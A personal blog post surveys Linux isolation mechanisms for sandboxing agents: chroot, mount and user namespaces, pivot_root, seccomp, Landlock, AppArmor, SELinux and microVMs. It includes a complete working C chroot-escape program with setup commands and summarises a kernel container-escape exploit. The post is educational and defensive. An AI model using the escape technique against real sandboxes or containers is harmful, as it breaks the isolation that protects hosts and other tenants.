Securing agents
Introduction
Well, this post really isn’t about securing agents, at least not as a practical guide. I wanted to use this opportunity to learn and write about the various techniques and mechanisms that have evolved over the years to isolate and sandbox code in a co-hosted environment, such as a time-sharing operating system like Linux or a UNIX (actually this post is pretty Linux specific, but you get the gist). I have not used any of the BSDs, so while I do know that BSD has the jails mechanism to isolate running code, I haven’t had any practical experience working with it, and sadly this post will not cover it.
Okay, enough foreplay, now let’s dive right in!
Chroot: The beginning
I wouldn’t really call chroot a security mechanism. It does change the / (root) directory of the calling process to the path specified as an argument (so chroot /tmp/jail makes /tmp/jail the root directory of the calling process), but it is trivial to break out of a chroot if the program you are executing has root permissions (a setuid binary, say) or the user running it has sufficient privileges (specifically, the CAP_SYS_CHROOT capability). More specifically, a root user inside a chroot can open a file descriptor to a directory inside the jail, chroot into a subdirectory (which leaves the saved descriptor pointing outside the new root), fchdir back to the saved descriptor, and then call chdir("..") repeatedly to walk up to the real root and escape the chroot “jail”.
The man page in fact explicitly mentions that chroot is not meant to be a process isolation or a filesystem restriction mechanism.
I had Claude craft a simple demonstration program for me and verified that it was possible to escape a chroot jail. The program, escape, is executed inside a chroot jail and performs the trick described above to break out. We can verify that it worked by checking whether it can access /etc/hostname and /etc/passwd on our host (which wouldn’t be possible if chroot truly could lock down our program’s access).
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <errno.h>
int main() {
    printf("[*] Attempting chroot escape...\n");
    // Step 1: Create a temporary directory
    if (mkdir("tmpdir", 0755) != 0 && errno != EEXIST) {
        printf("[-] mkdir failed: %s\n", strerror(errno));
        return 1;
    }
    // Step 2: Keep an fd to the current directory (it will lie outside the new root)
    int dir_fd = open(".", O_RDONLY);
    if (dir_fd < 0) {
        printf("[-] open failed: %s\n", strerror(errno));
        return 1;
    }
    // Step 3: Chroot into subdirectory
    if (chroot("tmpdir") != 0) {
        printf("[-] chroot failed: %s\n", strerror(errno));
        close(dir_fd);
        return 1;
    }
    // Step 4: Escape back via saved fd
    if (fchdir(dir_fd) != 0) {
        printf("[-] fchdir failed: %s\n", strerror(errno));
        close(dir_fd);
        return 1;
    }
    close(dir_fd);
    // Step 5: Walk up to real root (chdir("..") at / stays at /, so overshooting is harmless)
    for (int i = 0; i < 100; i++) {
        chdir("..");
    }
    // Step 6: Set real root
    if (chroot(".") != 0) {
        printf("[-] final chroot failed: %s\n", strerror(errno));
        return 1;
    }
    // Step 7: Try to read /etc/hostname as proof of escape
    printf("[*] Trying to read /etc/hostname...\n");
    FILE *f = fopen("/etc/hostname", "r");
    if (f) {
        char buf[256];
        if (fgets(buf, sizeof(buf), f))
            printf("[+] ESCAPED! /etc/hostname: %s", buf);
        fclose(f);
    } else {
        printf("[-] Escape failed: %s\n", strerror(errno));
    }
    // Step 8: Check that /etc/passwd is visible as further proof
    printf("[*] Trying to list /etc...\n");
    if (access("/etc/passwd", F_OK) == 0) {
        printf("[+] ESCAPED! /etc/passwd is accessible\n");
    } else {
        printf("[-] /etc/passwd not accessible: %s\n", strerror(errno));
    }
    return 0;
}
gcc -o escape escape.c
sudo mkdir -p /tmp/jail/bin /tmp/jail/lib
sudo cp /bin/sh /bin/ls /tmp/jail/bin/
sudo cp escape /tmp/jail/
# Copy required shared libs
sudo ldd /bin/sh | grep -o '/lib[^ ]*' | while read lib; do
sudo cp --parents "$lib" /tmp/jail/
done
sudo chroot /tmp/jail /bin/sh
# Now inside the jail:
# ./escape
Namespaces, Capabilities and pivot_root
Obviously chroot isn’t sufficient, because a program run by root (or a setuid binary) can break out of it. It was built more as a mechanism to create isolated builds of programs without destroying or corrupting the filesystem while installing or updating packages, but people clearly needed some way to run code in an isolated fashion. Enter namespaces, capabilities and pivot_root.
I assume you know what namespaces, capabilities and mounts in a Linux system are, but if you don’t, or your memory of them isn’t sharp, scroll down to the Appendix section for a refresher.
The pivot_root system call (also available as a shell command) “swaps” the root mount of the calling process: the directory provided as the first argument becomes the new root, and the old root is moved to the directory provided as the second argument. Once the roots have been swapped, we can unmount the old root so that our isolated program can no longer reach it.
Changing the root of a system is a hazardous operation, so these steps are carried out in a new, private mount namespace so that the changes made there don’t affect the rest of the system. Container runtimes (such as runc or containerd), used by Kubernetes, Docker etc., set up a mount namespace for containers before running them to create this illusion of isolated systems.
mkdir -p /tmp/pivot_root_jail/bin /tmp/pivot_root_jail/lib
mkdir -p /tmp/pivot_root_jail/.old_root
cp /bin/sh /bin/ls /tmp/pivot_root_jail/bin/
cp escape /tmp/pivot_root_jail
# Copy required shared libs
ldd /bin/sh | grep -o '/lib[^ ]*' | while read lib; do
cp --parents "$lib" /tmp/pivot_root_jail/
done
# Copy umount and its required libraries into our new root
cp /usr/bin/umount /tmp/pivot_root_jail/bin/
ldd /usr/bin/umount | grep -o '/lib[^ ]*' | while read lib; do
cp --parents "$lib" /tmp/pivot_root_jail/
done
unshare --mount --fork bash -c '
mount --bind /tmp/pivot_root_jail /tmp/pivot_root_jail
cd /tmp/pivot_root_jail
pivot_root . .old_root
umount -l .old_root
./escape
'
Running the same escape program in a new mount namespace, with only a subset of the host’s directory tree visible, we can see that even as root our program cannot access the hostname or passwd files, thus “jailing” our program.
[*] Attempting chroot escape...
[*] Trying to read /etc/hostname...
[-] Escape failed: No such file or directory
[*] Trying to list /etc...
[-] /etc/passwd not accessible: No such file or directory
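The same sequence can also be driven directly from C, which is closer to what a container runtime does. This is only a minimal sketch under a few assumptions: the helper name enter_new_root is made up for illustration, the caller is assumed to hold CAP_SYS_ADMIN, and the calls go through syscall() because glibc ships no pivot_root wrapper. Passing "." for both arguments is the variant described in the pivot_root(2) man page, which avoids needing a separate .old_root directory.

```c
#include <linux/sched.h>   /* CLONE_NEWNS */
#include <sys/mount.h>     /* mount, umount2, MS_*, MNT_DETACH */
#include <sys/syscall.h>   /* SYS_unshare, SYS_pivot_root */
#include <unistd.h>        /* syscall, chdir */

/* Hypothetical helper: make new_root the root directory of the calling
 * process. Returns 0 on success, -1 (errno set) at the first failing step. */
int enter_new_root(const char *new_root) {
    /* New mount namespace, the equivalent of `unshare --mount`. */
    if (syscall(SYS_unshare, CLONE_NEWNS) != 0)
        return -1;
    /* Make every mount private so nothing propagates back to the host. */
    if (mount(NULL, "/", NULL, MS_REC | MS_PRIVATE, NULL) != 0)
        return -1;
    /* pivot_root requires new_root to be a mount point: bind it onto itself. */
    if (mount(new_root, new_root, NULL, MS_BIND | MS_REC, NULL) != 0)
        return -1;
    if (chdir(new_root) != 0)
        return -1;
    /* With "." twice, the old root ends up stacked on top of the new one. */
    if (syscall(SYS_pivot_root, ".", ".") != 0)
        return -1;
    /* Lazily detach the old root, the same effect as `umount -l .old_root`. */
    if (umount2(".", MNT_DETACH) != 0)
        return -1;
    return chdir("/");
}
```

A caller would run enter_new_root("/tmp/pivot_root_jail") and then exec the program to be jailed. Without sufficient privileges the very first step fails and the function returns -1.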
Mount namespaces are a starting point. The next issue that crops up is that our user inside the namespace is still root, with access to kernel APIs for manipulating networking, accessing shared IPC primitives, loading drivers, mounting filesystems and so on. We can also create a user namespace when calling unshare (the --user and --map-root-user options), which makes our bash process root inside the isolation but maps it to a non-privileged user outside of it.
This way a user gets all permissions within the isolation but cannot manipulate anything outside of it.
This seems to be the approach used by rootless container runtimes such as podman.
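To make the “root inside, unprivileged outside” mapping concrete, here is a minimal sketch of what unshare --user --map-root-user roughly boils down to. The helper names (write_file, enter_user_namespace) are hypothetical, and the sketch assumes a kernel that permits unprivileged user namespaces; some distros disable them. The unshare call is made through syscall() purely to keep the sketch independent of feature-test macros.

```c
#include <fcntl.h>
#include <linux/sched.h>   /* CLONE_NEWUSER */
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Hypothetical helper: write a short string to an existing /proc file. */
static int write_file(const char *path, const char *text) {
    int fd = open(path, O_WRONLY);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, text, strlen(text));
    close(fd);
    return n == (ssize_t)strlen(text) ? 0 : -1;
}

/* Hypothetical helper: move the calling process into a new user namespace
 * in which it is uid 0 / gid 0, mapped to its original ids outside.
 * Returns 0 on success, -1 on failure. */
int enter_user_namespace(void) {
    unsigned outer_uid = (unsigned)getuid();
    unsigned outer_gid = (unsigned)getgid();
    char map[64];

    if (syscall(SYS_unshare, CLONE_NEWUSER) != 0)
        return -1;
    /* Map format: "<id inside> <id outside> <count>". */
    snprintf(map, sizeof(map), "0 %u 1\n", outer_uid);
    if (write_file("/proc/self/uid_map", map) != 0)
        return -1;
    /* An unprivileged process must give up setgroups() before it may
     * write gid_map. */
    if (write_file("/proc/self/setgroups", "deny") != 0)
        return -1;
    snprintf(map, sizeof(map), "0 %u 1\n", outer_gid);
    if (write_file("/proc/self/gid_map", map) != 0)
        return -1;
    return 0;
}
```

After a successful call getuid() reports 0, yet files created by the process still belong to the original user when viewed from the host.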
Seccomp
Namespace isolation is fine, but sometimes it isn’t sufficient. To isolate a target process using only namespaces and mount points, we would need to anticipate every operation an arbitrary process might attempt, and that might not be possible. Linux therefore provides the seccomp facility, which allows filtering or blocking the system calls made by a target process.
seccomp works by installing a filter that runs on every system call made by the target process and its children. Typically the filter allows a specified set of system calls and applies a default action to everything else: returning an error, sending a SIGKILL to the target process, or just logging the call. Filters can also inspect the arguments of a system call, so that the call is rejected only when made with a certain argument (such as fd = 1, for example), but this is a bit difficult to use reliably, as file descriptors etc. can change on every run.
The filters are written in classic BPF (cBPF, not the extended eBPF used elsewhere in the kernel nowadays) and installed via the prctl or seccomp system calls.
It is not feasible to expect every developer to write these filters reliably, so tools like Docker, Kubernetes and Flatpak allow setting up seccomp filtering via a seccomp profile, a JSON file specifying the list of allowed syscalls and the policy for what should be done when the program executes any other syscall.
Here is an example program that installs a seccomp filter to block the clock_gettime system call.
Note that on many distros clock_gettime goes through the vDSO, a Linux feature that accelerates common system calls by letting them run in user space without switching into the kernel. A call served by the vDSO never reaches the seccomp filter, so in our example we bypass the libc clock_gettime wrapper and use syscall(SYS_clock_gettime, ...) to ensure that the call goes through the system call interface.
One more important step before installing a seccomp filter is to prevent the program from acquiring new privileges (or capabilities). After calling prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0), our process and its children can no longer gain privileges by executing a setuid binary or a binary with file capabilities. The kernel requires this (or CAP_SYS_ADMIN) before it accepts a filter, because otherwise an unprivileged process could install a malicious filter and then exec a setuid program that misbehaves when its system calls unexpectedly fail.
#include <stdio.h>
#include <stdlib.h>
#include <stddef.h>
#include <unistd.h>
#include <linux/seccomp.h>
#include <linux/filter.h>
#include <linux/audit.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <time.h>
#include <errno.h>
#include <string.h>
// Architecture check varies by platform
#if defined(__x86_64__)
#define ARCH_NR AUDIT_ARCH_X86_64
#elif defined(__aarch64__)
#define ARCH_NR AUDIT_ARCH_AARCH64
#else
#error "Unsupported architecture"
#endif
void install_filter() {
    struct sock_filter filter[] = {
        // Load the syscall architecture
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS,
                 offsetof(struct seccomp_data, arch)),
        // Verify it's our architecture; kill the process otherwise
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, ARCH_NR, 1, 0),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),
        // Load the syscall number
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS,
                 offsetof(struct seccomp_data, nr)),
        // Block clock_gettime by failing it with EPERM
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, SYS_clock_gettime, 0, 1),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | (EPERM & SECCOMP_RET_DATA)),
        // Allow everything else
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
    };
    struct sock_fprog prog = {
        .len = (unsigned short)(sizeof(filter) / sizeof(filter[0])),
        .filter = filter,
    };
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0) {
        perror("prctl(NO_NEW_PRIVS)");
        exit(1);
    }
    if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) != 0) {
        perror("prctl(SECCOMP)");
        exit(1);
    }
}
int main() {
    printf("[*] Before seccomp filter:\n");
    struct timespec ts;
    // Raw syscall: the libc wrapper may be served by the vDSO and never reach the filter
    if (syscall(SYS_clock_gettime, CLOCK_REALTIME, &ts) == 0) {
        printf("[+] clock_gettime works: %ld seconds\n", ts.tv_sec);
    }
    printf("[*] Installing seccomp filter...\n");
    install_filter();
    printf("[*] After seccomp filter:\n");
    if (syscall(SYS_clock_gettime, CLOCK_REALTIME, &ts) == 0) {
        printf("[+] clock_gettime works: %ld seconds\n", ts.tv_sec);
    } else {
        printf("[-] clock_gettime BLOCKED: %s\n", strerror(errno));
    }
    // Prove other syscalls still work
    printf("[+] printf still works (write syscall allowed)\n");
    printf("[+] getpid = %d (allowed)\n", getpid());
    return 0;
}
I ran this both as root and non-root users to verify that the call to clock_gettime is blocked after the filter is installed
root@6d568538fe36:/# gcc seccomp_filter.c -o secf
root@6d568538fe36:/# ./secf
[*] Before seccomp filter:
[*] Installing seccomp filter...
[*] After seccomp filter:
[-] clock_gettime BLOCKED: Operation not permitted
[+] printf still works (write syscall allowed)
[+] getpid = 1529 (allowed)
root@6d568538fe36:/# useradd -m testuser
cp secf /home/testuser/
su testuser -c '/home/testuser/secf'
[*] Before seccomp filter:
[*] Installing seccomp filter...
[*] After seccomp filter:
[-] clock_gettime BLOCKED: Operation not permitted
[+] printf still works (write syscall allowed)
[+] getpid = 1541 (allowed)
For more information on Capabilities and privileges, the man page on prctl is well worth a read.
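The argument filtering mentioned earlier can be sketched in the same style. The hypothetical deny_ipv4_sockets helper below is my own illustration, not something taken from a real tool: it fails socket() with EPERM only when the first argument is AF_INET, and allows every other call. It assumes a little-endian x86_64 or aarch64 system, where the low 32 bits of args[0] sit at the start of the field.

```c
#include <errno.h>
#include <stddef.h>
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/syscall.h>

#if defined(__x86_64__)
#define SKETCH_ARCH AUDIT_ARCH_X86_64
#elif defined(__aarch64__)
#define SKETCH_ARCH AUDIT_ARCH_AARCH64
#else
#error "Unsupported architecture"
#endif

/* Hypothetical helper: returns 0 once the filter is installed, -1 otherwise. */
int deny_ipv4_sockets(void) {
    struct sock_filter filter[] = {
        /* 0: load the architecture and kill on a mismatch */
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, arch)),
        /* 1 */ BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, SKETCH_ARCH, 1, 0),
        /* 2 */ BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),
        /* 3: load the syscall number */
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
        /* 4: anything other than socket() skips 3 instructions, to ALLOW */
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, SYS_socket, 0, 3),
        /* 5: load the low 32 bits of the first argument (the domain) */
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, args[0])),
        /* 6: a domain other than AF_INET skips 1 instruction, to ALLOW */
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AF_INET, 0, 1),
        /* 7: socket(AF_INET, ...) fails with EPERM */
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | (EPERM & SECCOMP_RET_DATA)),
        /* 8: everything else is allowed */
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
    };
    struct sock_fprog prog = {
        .len = (unsigned short)(sizeof(filter) / sizeof(filter[0])),
        .filter = filter,
    };
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0)
        return -1;
    if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) != 0)
        return -1;
    return 0;
}
```

This works because the socket domain is a plain integer. The same approach cannot inspect anything passed by pointer, such as a file path.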
The bubblewrap utility (the bwrap binary) wraps namespace setup and the loading of a seccomp filter behind a user-friendly command line. You can see bubblewrap being used by OpenAI’s codex cli to execute code in isolation so that it doesn’t end up executing arbitrary code and nuking your system.
Landlock
seccomp allows filtering of system calls, but its greatest limitation seems to be that it cannot filter on anything passed by pointer. For example, what if we want to block the open system call for a particular path (/etc/passwd)? The path is passed as a pointer (const char*), and a seccomp filter only sees the raw argument values: it cannot dereference pointers into userspace memory, since that would need kernel functions to copy the data into kernel space, which isn’t feasible from within the filter.
Enter landlock. landlock is a sandboxing API that allows even unprivileged users/processes to voluntarily give up certain privileges to enhance security. For example, a process can set up a landlock ruleset that allows read/write access to the /tmp folder and nothing else:
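// Rule: allow reading and writing files beneath /tmp
struct landlock_path_beneath_attr path = {
    .allowed_access = LANDLOCK_ACCESS_FS_READ_FILE | LANDLOCK_ACCESS_FS_WRITE_FILE,
    .parent_fd = open("/tmp", O_PATH),
};
// glibc ships no wrapper for this call: landlock_add_rule here stands for
// syscall(SYS_landlock_add_rule, ...), and ruleset_fd comes from landlock_create_ruleset
landlock_add_rule(ruleset_fd, LANDLOCK_RULE_PATH_BENEATH, &path, 0);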
You can see codex using landlock, if configured for example, to setup read-only access to / when executing code.
During my research, I wondered why landlock APIs didn’t seem to be included within the bubblewrap tool, and someone else had wondered the same thing. The maintainers of bubblewrap, however, seem to consider landlock to be orthogonal to the purpose of bubblewrap: they would rather treat the filesystem and user namespace setup done by bwrap as sufficient to enforce security, and leave it to other tools to wrap landlock themselves if needed.
AppArmor and SELinux
The landlock API described above is opt-in, that is, applications have to voluntarily give up privileges. What if you are setting up a shared server and, as an admin, want to enforce policies on any arbitrary binary that may or may not use security APIs? Enter AppArmor and SELinux.
Both of them (like capabilities etc.) are implemented as Linux Security Modules, a framework that allows various security enforcement mechanisms to be stacked on top of one another. The fundamental difference between the two (as summarized on the AppArmor website) seems to be that AppArmor is application focused: sysadmins write and enforce policies on what specific applications can do. SELinux, on the other hand, sets up labels per resource (files, sockets, processes etc.) and uses rules that define how these labels can interact with one another to enforce security.
For example, as shown on the AppArmor website, an AppArmor policy for the ping executable grants (or denies) certain capabilities to it. In the following example, we deny the ping utility the ability to open RAW sockets, which defeats the purpose of ping but demonstrates what AppArmor can do:
/usr/bin/ping flags=(complain) {
deny capability net_raw,
}
SELinux, by contrast, sets up labels on resources, and policies specify which labels can access which other labels, and for which operations in particular.
A context looks like this:
user:role:type:level
# Check a file's context
ls -Z /var/www/html/index.html
# system_u:object_r:httpd_sys_content_t:s0 /var/www/html/index.html
# Check a process's context
ps -eZ | grep httpd
# system_u:system_r:httpd_t:s0 1234 ? 00:00:01 httpd
The type field is what matters most. Here httpd runs as httpd_t and the web files are labeled httpd_sys_content_t.
A policy rule then says:
# Allow httpd_t to read files labeled httpd_sys_content_t
allow httpd_t httpd_sys_content_t:file { read open getattr };
Everything not explicitly allowed is denied. So if httpd tries to read /etc/shadow:
ls -Z /etc/shadow
# system_u:object_r:shadow_t:s0 /etc/shadow
No rule allows httpd_t to read files labeled shadow_t, so the read is denied.
But are these mechanisms enough?
The timing of my article was fortuitous, for as I was trying to understand the need for Namespaces, Landlock, SELinux etc., the Copyfail kernel exploit grabbed headlines with its ability to break out of container isolation to gain access to the host (or at least to other containers running on the same host, thus breaking container to container isolation).
There is a fantastic writeup on how this exploit works, but to summarize: it exploits the kernel’s cryptography API, which is available to non-privileged users by default, to inject shellcode into the su binary (which can also be invoked by non-privileged users). Executing the tampered su binary then gives root access within the container and, if no user namespace is set up for the container, lets the attacker break out of containment with at least potential access to other containers and possibly the host system as well.
This brings us to 2 points:
- Containers and namespaces still share the same kernel as the host. The implication here is that there are potentially still pathways in the kernel code that could be exploited to access resources on the host, since the same kernel context is shared across multiple containers
- Namespace isolation might never be enough. We need additional controls, possibly at the hardware/register level to be able to truly isolate processes
Micro VMs
Enter Virtualization. Virtualization isn’t new; in fact, if my memory serves me right, hardware virtualization predates Linux namespaces and privileges. Commercial CPUs from AMD, Intel (and ARM) have long supported virtualization: running guest operating systems within a host operating system. The hardware provides capabilities and primitives to isolate the memory access of a guest operating system from that of the host (including memory encryption), modes etc. to securely run a guest operating system on a host without sharing the virtual memory at all. The Linux kernel provides KVM, the Kernel-based Virtual Machine, to run guest operating systems with shared and isolated access to devices (network cards, disks, GPUs etc.) on the host.
You can run a Linux distro, for example, as a guest OS using tools like qemu. qemu can run guest operating systems using emulation (faking, say, an ARM device on an Intel PC) or virtualization (running a Windows guest inside a Linux host, or an Alpine guest inside a Debian host).
There is a great paper and article by David Kaplan, one of the architects of AMD’s SEV (Secure Encrypted Virtualization), on how virtualization is supported by AMD CPUs.
As an example, here is a qemu command to run an alpine distro as a guest on your debian/ubuntu host, booting from an alpine distro image
qemu-system-x86_64 \
-enable-kvm \
-m 2048 \
-nic user,model=virtio \
-drive file=alpine.qcow2,media=disk,if=virtio \
-cdrom alpine-standard-3.8.0-x86_64.iso \
-sdl
Firecracker
Firecracker, developed by AWS, is an alternative to qemu with a focus on being light, secure and really fast to boot. Its initial goal was to serve as the platform for AWS Lambda, where user-submitted lambda functions need to be cold-started and run extremely fast. Unlike qemu it doesn’t seem to be a full-on emulator, and its virtualization support is limited to a few device types (such as block devices, networking devices, console devices etc.), which reduces its size and keeps it simple, secure and fast.
Iximiuz Labs has a great course on setting up and learning Firecracker and I intend to do it over a weekend to get to know it a bit better.
Conclusion
I didn’t really expect to dive so deep into Linux and hardware internals when starting out to write this blog post. My question was simple: how can I secure my agents? Turns out the answer is very complicated, as the definition of security is rather difficult: Secure from whom? What are the boundaries, and what are the limitations of each security mechanism? Writing this article has given me a much better understanding and appreciation of tools like Docker and Kubernetes. While most developers loathe having to use these tools, it is really important to understand why these mechanisms were implemented in the first place and that they all serve an essential role. Docker might have become a quick and easy way to distribute development and execution environments for code across multiple machines, but its roots seem to lie in the need for better security and isolation, and the spillover benefits of those mechanisms resulted in the ability to spin up an extremely predictable environment across multiple machines with a simple docker run command!
This list mentioned above isn’t exhaustive. I am fairly certain that there are other mechanisms that I have no idea about but are important and I might encounter them in the future. I haven’t explored Security mechanisms in other systems like BSDs or Windows but that probably is a topic for another day.
Appendix
Namespaces: A mechanism to provide isolation. Items in different namespaces cannot see one another, but ones in the same namespace can. Linux allows you to create namespaces for many things:
- Process namespaces - a namespace for a hierarchy of processes. You can spin up a new init process that is different from the init running on your host Linux, for example, or launch a parent + child process group that cannot see any other group but itself (for containers)
- Mount namespace - a namespace to isolate the filesystem mount table, so that any changes made to the mounts stay within that namespace and are not reflected outside of it. The mount namespace is the primary tool used to achieve the kind of isolation that chroot ideally should have provided but never really did
- IPC, NET, UTS namespaces - namespaces to isolate interprocess communication, networking and the hostname respectively. We will not go in-depth into any of these
Capabilities: While initially there were only privileged processes (running as root) and unprivileged processes, capabilities break the privileges down into sub-units, so that a process need not run as root but can be given just the subset of privileges it needs to carry out its functionality. The Linux man pages list all the capabilities that can be granted. For example, a process with the capability CAP_NET_ADMIN can manipulate network interfaces and configuration on the system, but gains no additional permissions on filesystem operations.
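Under the hood a capability set is just a bitmask, which the kernel exposes in /proc/self/status. As a minimal sketch (the helper name has_effective_cap is hypothetical, and real code would more likely use libcap), this checks whether the current process holds a given capability in its effective set:

```c
#include <linux/capability.h>  /* CAP_NET_ADMIN and the other CAP_* numbers */
#include <stdio.h>

/* Hypothetical helper: returns 1 if the calling process has `cap` in its
 * effective capability set, 0 if it does not, and -1 if the CapEff line
 * of /proc/self/status could not be read. */
int has_effective_cap(int cap) {
    FILE *f = fopen("/proc/self/status", "r");
    if (!f)
        return -1;
    char line[256];
    unsigned long long mask = 0;
    int result = -1;
    while (fgets(line, sizeof(line), f)) {
        /* The line looks like "CapEff:\t000001ffffffffff" (hexadecimal). */
        if (sscanf(line, "CapEff: %llx", &mask) == 1) {
            result = (int)((mask >> cap) & 1ULL);
            break;
        }
    }
    fclose(f);
    return result;
}
```

Calling has_effective_cap(CAP_NET_ADMIN) typically gives 1 for root on the host and 0 for an ordinary user, or for root inside a container that was started with that capability dropped.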
Mount Points: When we talk about “mounting” in Linux, we’re referring to attaching a filesystem (or a device, or even a virtual filesystem like proc or tmpfs) to a specific directory in the directory tree. That directory is the mount point. For example, when you plug in a USB drive and it shows up at /media/usb, that’s a mount point: the kernel has attached the device’s filesystem to that path.
Inside a mount namespace, you can set up an entirely different set of mount points than the host, like mounting a fresh tmpfs on /tmp, binding specific host directories into the namespace’s tree, or hiding host mounts entirely.
For isolation, a mount namespace starts as a copy of the parent’s mount table, but from that point on any mounts or unmounts you do inside it are invisible to the outside, provided mount propagation is set to private (for example with mount --make-rprivate).
This is powerful because it means you can mount a completely different root filesystem for your isolated process, layer in read-only mounts for things the process should see but not modify, and generally construct a minimal, purpose-built filesystem view, all without the process ever knowing it doesn’t have access to the real root.
This is the foundation of how container runtimes like runc set things up before calling pivot_root: they create a mount namespace, carefully construct the filesystem tree the container should see, and then pivot into it. The process inside genuinely cannot see or reach anything you didn’t explicitly mount in, which is a far cry from chroot, where a determined root process could just walk its way back out. This makes it possible to give a process its own view of the filesystem without actually copying anything.
Namespacing also extends to things like process IDs (where you don’t want your isolated process and its children to see other running processes on the host), IPC (no access to the pipes or shared memory of other processes) and networks (control and restrict how the isolated process can communicate with the rest of the host and the world).
Kubernetes: Kubernetes provides the ability to set up seccomp profiles, add or remove capabilities from containers and/or set up SELinux/AppArmor profiles.
Docker: Docker also allows customizing capabilities and setting up a seccomp profile when running containers. For the pivot_root example above, I had to run a container with the SYS_ADMIN capability added and seccomp=unconfined to be able to call pivot_root in a Docker container on macOS, since Docker works on macOS by running containers inside a Linux VM and by default a lot of system calls are filtered on the VM.
docker run --cap-add=SYS_ADMIN --security-opt="seccomp=unconfined" -it ubuntu:24.04 bash
Be careful though, as you might be allowing arbitrary code to have access to all sorts of privileged APIs on the VM used by Docker, thus exposing other containers running on your machine.